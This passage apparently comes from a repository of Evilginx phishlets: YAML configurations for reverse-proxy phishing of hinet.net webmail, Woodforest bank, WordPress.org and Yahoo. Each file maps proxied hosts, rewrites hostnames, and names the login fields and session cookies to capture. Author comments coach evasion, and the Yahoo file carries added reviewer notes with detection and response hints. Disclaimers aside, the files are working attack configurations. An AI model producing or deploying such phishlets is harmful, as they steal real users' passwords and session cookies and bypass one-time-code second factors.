9 | # TRY TO ADD MORE DOMAINS/SUBDOMAINS IF THEY ARE PRESENT DURING SITE LOADING (CHECK NETWORK TAB IN DEVELOPERS TOOLS)
10 |
11 | sub_filters: []
12 |
13 | # LEARN TO USE SUBFILTERS (DON'T DEPEND ON AUTOFILTER BY EVILGINX)
14 |
15 | # WITHOUT SUB FILTERS SOMETIMES THE USER CAN REDIRECT TO ORIGINAL DOMAINS/SUBDOMAINS , SO USE THE SUBFILTERS CAREFULLY
16 |
17 | #CHECK THESE AIRBNB FILTERS....
18 |
19 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
20 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
21 | # - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
22 |
23 |
24 | auth_tokens: # cookies recorded as the captured session
25 | - domain: 'webmail.hinet.net' # CHECK THE OFFICIAL WIKI FOR HOW TO USE AUTH TOKENS TO GRAB ALL NECESSARY TOKENS.
26 | keys: ['JSESSIONID(.*),regexp'] # regular-expression match: any cookie whose name begins with JSESSIONID
27 |
28 | credentials: # parameters read out of the proxied login POST
29 | username:
30 | key: 'mailid'
31 | search: '(.*)' # capture group takes the whole parameter value
32 | type: 'post'
33 | password:
34 | key: 'password'
35 | search: '(.*)'
36 | type: 'post'
37 | # HERE YOU CAN ALSO ADD SOME CUSTOM FIELD TO CAPTURE FROM REQUESTS CHECK WIKI TO SEE HOW TO DO THAT
38 | login: # host and path of the proxied login page
39 | domain: 'webmail.hinet.net'
40 | path: '/index.html'
41 |
42 | #LEARN TO USE JAVASCRIPT INJECTION AS WELL
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/phishlet_examples/woodforest.yaml:
--------------------------------------------------------------------------------
1 | # THE AUTHOR OF THIS PHISHLET DOES NOT SUPPORT ANY ILLEGAL ACTIVITIES...
2 |
3 | author: '@i_am_a_Good_Human'
4 | min_ver: '2.3.0'
5 | proxy_hosts:
6 | - {phish_sub: 'online', orig_sub: 'online', domain: 'woodforest.com', session: true, is_landing: true}
7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'woodforest.com', session: true, is_landing: false}
8 | - {phish_sub: '', orig_sub: '', domain: 'woodforest.com', session: true, is_landing: false}
9 |
10 | sub_filters:
11 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 | - {triggers_on: 'online.woodforest.com', orig_sub: 'online', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 | - {triggers_on: 'online.woodforest.com', orig_sub: 'www', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
15 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 | - {triggers_on: 'online.woodforest.com', orig_sub: '', domain: 'woodforest.com', search: '''{hostname_regexp}'';', replace: '''{hostname_regexp}'';', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 |
18 |
19 | auth_tokens:
20 | - domain: '.woodforest.com'
21 | keys: ['sessionid','.*,regexp']
22 | credentials:
23 | username:
24 | key: 'principal'
25 | search: '(.*)'
26 | type: 'post'
27 | password:
28 | key: 'password'
29 | search: '(.*)'
30 | type: 'post'
31 | login:
32 | domain: 'online.woodforest.com'
33 | path: '/login'
34 |
35 | # THE AUTHOR OF THIS PHISHLET DOES NOT SUPPORT ANY ILLEGAL ACTIVITIES...
36 |
37 |
--------------------------------------------------------------------------------
/phishlet_examples/wordpress.org.yaml:
--------------------------------------------------------------------------------
1 | # Evilginx phishlet configuration file for WordPress.org.
2 | #
3 | # This is a phishing configuration for the main WordPress.org domain,
4 | # it is *not* immediately useful for phishing self-hosted sites that
5 | # run on the WordPress software.
6 | #
7 | # For such self-hosted sites, some modifications are needed. Refer to
8 | # the comments in this file for some guidance on creating a phishlet
9 | # to use against self-hosted WordPress sites.
10 | ---
11 | name: 'WordPress.org'
12 | author: '@meitar'
13 | min_ver: '2.3.0'
14 |
15 | proxy_hosts:
16 | # Proxy the primary domain.
17 | - phish_sub: ''
18 | orig_sub: ''
19 | domain: 'wordpress.org'
20 | session: true
21 | is_landing: true
22 |
23 | # These proxied should be removed when phishing self-hosted sites.
24 | - phish_sub: 'login'
25 | orig_sub: 'login'
26 | domain: 'wordpress.org'
27 | session: true
28 | is_landing: false
29 | - phish_sub: 'make'
30 | orig_sub: 'make'
31 | domain: 'wordpress.org'
32 | session: true
33 | is_landing: false
34 | - phish_sub: 'profiles'
35 | orig_sub: 'profiles'
36 | domain: 'wordpress.org'
37 | session: true
38 | is_landing: false
39 |
40 | sub_filters: []
41 |
42 | # For self-hosted WordPress sites, you may find it easier to use a
43 | # regular expression to match session cookies, as the cookie names
44 | # are produced uniquely per-site. This can be done as follows:
45 | #
46 | # ```yaml
47 | # - domain: 'self-hosted-domain.com'
48 | # keys:
49 | # - 'wordpress_sec_.*,regexp'
50 | # - 'wordpress_logged_in_.*,regexp'
51 | # ```
52 | #
53 | # If you do choose to use the regular expression facility, you
54 | # will also then need to use the `auth_urls` dictionary to define
55 | # when Evilginx should actually capture these tokens. Something
56 | # like this should do the trick:
57 | #
58 | # ```yaml
59 | # auth_urls:
60 | # - '.*/wp-admin/.*'
61 | # ```
62 | #
63 | # The above ensures that the `auth_tokens` are noticed whenever
64 | # the phished user makes requests to URLs containing `wp-admin`.
65 | #
66 | # For the WordPress.org service itself, however, none of the above is
67 | # necessary, and the following simple `auth_tokens` dictionary should
68 | # work just fine.
69 | auth_tokens:
70 | - domain: '.wordpress.org'
71 | keys: ['wporg_logged_in', 'wporg_sec']
72 |
73 | credentials:
74 | username:
75 | key: 'log'
76 | search: '(.*)'
77 | type: 'post'
78 | password:
79 | key: 'pwd'
80 | search: '(.*)'
81 | type: 'post'
82 |
83 | # For a self-hosted WordPress site, you'll probably want to define the
84 | # `login` dictionary here as follows:
85 | #
86 | # ```yaml
87 | # login:
88 | # domain: 'self-hosted-domain.com'
89 | # path: '/wp-login.php'
90 | # ```
91 | #
92 | # Some WordPress plugins, such as WooCommerce, change the URL of the
93 | # login page. You'll want to examine the specific site for this.
94 | login:
95 | domain: 'login.wordpress.org'
96 | path: '/'
97 |
--------------------------------------------------------------------------------
/phishlet_examples/yahoo(fixed).yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 |
# Review note: phishlet header and host map. Each `proxy_hosts` entry pairs a
# legitimate yahoo.com hostname (`orig_sub` + `domain`) with the subdomain label
# the proxy answers on (`phish_sub`); only the `login` entry sets `is_landing: true`.
# Detection hint: a single registrable domain that serves the labels www, mail,
# login, guce, udc, fc, ads and csp together is consistent with this map. The
# labels are configurable, so treat this as a weak signal on its own.
5 | author: '@an0nud4y'
6 | min_ver: '2.3.0'
7 | proxy_hosts:
8 | - {phish_sub: '', orig_sub: '', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
10 | - {phish_sub: 'mail', orig_sub: 'mail', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
11 | - {phish_sub: 'login', orig_sub: 'login', domain: 'yahoo.com', session: true, is_landing: true, auto_filter: false}
12 | - {phish_sub: 'guce', orig_sub: 'guce', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
13 | - {phish_sub: 'udc', orig_sub: 'udc', domain: 'yahoo.com', session: true, is_landing: false, auto_filter: false}
14 | - {phish_sub: 'fc', orig_sub: 'fc', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
15 | - {phish_sub: 'ads', orig_sub: 'ads', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
16 | - {phish_sub: 'csp', orig_sub: 'csp', domain: 'yahoo.com', session: false, is_landing: false, auto_filter: false}
# Review note: response-rewrite rules. Each rule names a source host
# (`triggers_on`), a `search` hostname, a `replace` value and the MIME types it
# applies to; `{domain}` presumably expands to the proxy's own domain (confirm
# against the tool's documentation).
# Defensive relevance: the rewriting is confined to HTML/JavaScript/JSON bodies,
# so hostname checks done by page script see the rewritten name, while
# origin checks enforced by the browser itself (e.g. WebAuthn) are unaffected.
17 | sub_filters:
18 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
19 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
20 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
21 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
22 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
23 | - {triggers_on: 'login.yahoo.com', orig_sub: 'login', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
24 | - {triggers_on: 'mail.yahoo.com', orig_sub: 'mail', domain: 'yahoo.com', search: 'csp.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
25 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
26 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
27 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
28 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
29 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
30 | - {triggers_on: 'guce.yahoo.com', orig_sub: 'guce', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
31 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
32 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
33 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
34 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
35 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
36 | - {triggers_on: 'fc.yahoo.com', orig_sub: 'fc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
37 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'login.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
38 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'mail.yahoo.com', replace: 'mail.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
39 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'guce.yahoo.com', replace: 'guce.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
40 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'udc.yahoo.com', replace: 'udc.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
41 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'fc.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
42 | - {triggers_on: 'udc.yahoo.com', orig_sub: 'udc', domain: 'yahoo.com', search: 'ads.yahoo.com', replace: 'login.{domain}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']}
# Review note: the `,regexp` suffix makes each key a regular expression over
# cookie names, and `.*` matches every name, so all cookies for the five listed
# domains are in scope rather than one named session cookie.
# Impact for defenders: these cookies are post-login session state, so a
# one-time-code second factor does not prevent their reuse. Controls to verify:
# phishing-resistant (origin-bound) sign-in, short session lifetime with
# re-authentication, and session revocation (not only a password reset)
# during incident response.
43 | auth_tokens:
44 | - domain: '.yahoo.com'
45 | keys: ['.*,regexp']
46 | - domain: 'mail.yahoo.com'
47 | keys: ['.*,regexp']
48 | - domain: 'login.yahoo.com'
49 | keys: ['.*,regexp']
50 | - domain: 'guce.yahoo.com'
51 | keys: ['.*,regexp']
52 | - domain: 'udc.yahoo.com'
53 | keys: ['.*,regexp']
# Review note: names the POST form fields that are read from proxied requests:
# `username`, a field matching the anchored pattern `^password$`, and the custom
# field `browser-fp-data` (presumably a browser fingerprint submitted by the
# sign-in page; confirm). `(.*)` keeps the whole field value.
# Impact for defenders: the fields are read in transit, so a password typed on a
# look-alike host should be treated as exposed even if the sign-in never completed.
54 | credentials:
55 | username:
56 | key: 'username'
57 | search: '(.*)'
58 | type: 'post'
59 | password:
60 | key: '^password$'
61 | search: '(.*)'
62 | type: 'post'
63 | custom:
64 | - key: 'browser-fp-data'
65 | search: '(.*)'
66 | type: 'post'
# Review note: URL patterns (`/consent` and a path ending in `/`) that mark the
# point at which a session is treated as authenticated. With wildcard
# `auth_tokens` keys there is no fixed cookie list to wait for, so these
# patterns presumably decide when the cookie set is recorded (confirm).
67 | auth_urls:
68 | - '/consent'
69 | - '/$'
# Review note: the legitimate sign-in entry point that the landing host mirrors.
# The `.done` query parameter URL-decodes to https://mail.yahoo.com/d, presumably
# the post-sign-in destination (confirm). In proxy or DNS logs, this query
# string requested on a host that is not under yahoo.com is worth flagging.
70 | login:
71 | domain: 'login.yahoo.com'
72 | path: '/?.src=ym&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd'
73 |
74 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
75 | # PLEASE DO NOT MISUSE THIS PHISHLET.
76 |
77 |
--------------------------------------------------------------------------------